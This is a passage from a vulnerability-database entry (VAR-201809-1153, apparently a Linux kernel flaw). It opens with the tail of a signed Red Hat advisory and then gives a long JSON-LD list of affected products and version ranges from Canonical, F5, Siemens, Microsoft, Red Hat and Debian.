iQIVAwUBW+sPDtzjgjWX9erEAQhm3BAAhxwzb8zJTfl0zFY/r9KUzkAdLXY4w39X BgJrVPyl7f6krvQ17HE95Poqz/iUhMOZAweypQXHMRKkmfMTYiLHlKpdIusou2xy y1ZzB1uloI4j2zMdTDRP5yZz06r/NP5A05pLZDA02iR5b07ALLYb5hcL5oBnpQXp 9Xp31qb7TCP+jWtCO1Ot+9GJ3chMNvpYqH0OkGTpq/G7PxGrhIzB6v4p6N5OntD9 5CIebREaGBWn9ViWiUHcthgg+PN2iS2/5ST82g/Jss/WmVVZSiVbayob6/MNQPnb M29VHOmJ6pf5dERNpSqrJrBXeDYCMA6HHD+RT9SmiuQQ8gQ2Rzjy7K97Nn++6x7O nclOTmB7hQZtl0WhgC3xuwtslXGpe9jKSzql03ijTvJRQrczgVWiBS+tpfVAJprV ma2Kchf5ivctaXZ/R62JMyTvNf6HCVdvBNvSNET52ol3PkdpJK7V7mg+H64Mqdrl cBTUDBHHYYWMJted9pHWq7tPs0vy1h9aoFqNdlak5jwr169vldlZMRBbhtvz+OXj V/o+IClbY9UUfibaXDoX7qufeVikW1KQ4L+VhRj3RzXNsu2A8FUAcN7za5Qv5HIe LiC42C+pjvHqS/9gNpBakzKv6nPldWZIfPEuF4zewizBxlTXHPE1ln1hAWKjqVTs 6QJ1Zh7jeUY= =8JOQ -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Bug Fix(es):

These updated kernel packages include also numerous bug fixes

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201809-1153",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "simatic net cp 1542sp-1 irc",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "windows server 2016",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "windows rt 8.1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1607"
      },
      {
        "model": "scalance m-800",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "6.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "windows 7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "simatic net cp 1243-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.2"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "simatic rf188",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.3"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "simatic net cp 1243-7 lte eu",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.2"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "simatic rf185c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.3"
      },
      {
        "model": "scalance s615",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "6.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "simatic rf186ci",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.3"
      },
      {
        "model": "simatic rf186c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.3"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "scalance sc-600",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "windows 8.1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "simatic net cp 1243-8 irc",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.2"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "simatic rf188ci",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "ruggedcom rm1224",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "6.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "windows server 2012",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "windows server 2016",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1709"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "simatic net cp 1542sp-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "ruggedcom rox ii",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.13.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "sinema remote connect server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "simatic net cp 1243-7 lte us",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "windows server 2016",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1803"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1703"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "simatic net cp 1543-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.2"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "simatic net cp 1543sp-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1709"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "simatic net cp 1242-7",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.2"
      },
      {
        "model": "sinema remote connect server",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "scalance w1700 ieee 802.11ac",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "windows server 2012",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "scalance w700 ieee 802.11a\\/b\\/g\\/n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "6.4"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "1803"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.20"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "extendible operating system 4.20.5f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
